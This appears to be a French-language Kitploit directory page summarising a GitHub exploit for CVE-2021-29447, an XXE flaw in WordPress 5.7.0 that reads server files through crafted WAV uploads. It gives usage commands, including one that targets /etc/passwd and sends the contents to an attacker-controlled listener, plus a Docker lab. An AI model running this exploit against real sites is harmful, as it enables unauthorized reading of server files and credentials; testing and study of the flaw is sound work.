Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-29447 — Exploit pour CVE-2021-29447, une vulnérabilité XXE dans WordPress 5.7.0 et versions antérieures. Génère des charges utiles WAV malveillantes pour lire des fichiers arbitraires du serveur via une injection d'entité externe XML. Comprend un environnement de test Docker. | Kitploit
Outils/GitHubGitHub/danilo1992-sys/cve-2021-29447
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubdanilo1992-sys/cve-2021-29447

CVE-2021-29447

Exploit pour CVE-2021-29447, une vulnérabilité XXE dans WordPress 5.7.0 et versions antérieures. Génère des charges utiles WAV malveillantes pour lire des fichiers arbitraires du serveur via une injection d'entité externe XML. Comprend un environnement de test Docker.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 5 moisPas encore vérifié

CVE-2021-29447 - Exploit de vulnérabilité XXE WordPress

Description

Ce dépôt contient un exploit pour CVE-2021-29447, une vulnérabilité XXE (XML External Entity) présente dans WordPress 5.7.0 et versions antérieures. La vulnérabilité existe dans la bibliothèque média qui traite les fichiers WAV, permettant à un attaquant de lire des fichiers arbitraires du serveur.

Prérequis

  • Bash
  • Python 3
  • Docker et Docker Compose (pour monter l'environnement de test)
  • Serveur WordPress vulnérable (5.7.0 ou inférieur)

Fichiers

FichierDescription
CVE-2021-29447.shScript d'exploitation qui génère le payload WAV et le fichier DTD malveillant
decode.phpScript PHP pour décoder les données exfiltrées (base64 + zlib)
docker-compose.ymlEnvironnement Docker avec WordPress vulnérable pour les tests

Utilisation

1. Monter l'environnement de test

root@kitploit:~
docker-compose up -d

2. Exécuter l'exploit

root@kitploit:~
chmod +x CVE-2021-29447.sh
./CVE-2021-29447.sh -l <LHOST> -p <LPORT> -f <fichier_cible>

Paramètres :

  • -l IP de l'attaquant (LHOST)
  • -p Port de l'attaquant (LPORT)
  • -f Chemin du fichier à lire sur le serveur
  • -h Afficher l'aide

Exemple :

root@kitploit:~
./CVE-2021-29447.sh -l 192.168.1.100 -p 4444 -f /etc/passwd

3. Décoder les données

Les données exfiltrées seront encodées en base64 et compressées avec zlib. Pour les décoder :

root@kitploit:~
php decode.php

Technique

L'exploit fonctionne en insérant une entité externe XXE dans les métadonnées d'un fichier WAV. Lorsque WordPress traite le fichier, l'analyseur XML résout l'entité externe, amenant le serveur à effectuer une requête HTTP vers le serveur de l'attaquant avec le contenu du fichier encodé dans l'URL.

Références

  • CVE-2021-29447
  • WordPress 5.7.0 Security Release

Avertissement

Ce code est uniquement à des fins éducatives et de tests de pénétration autorisés. Ne l'utilisez pas sur des systèmes sans autorisation explicite.

Télécharger l’outil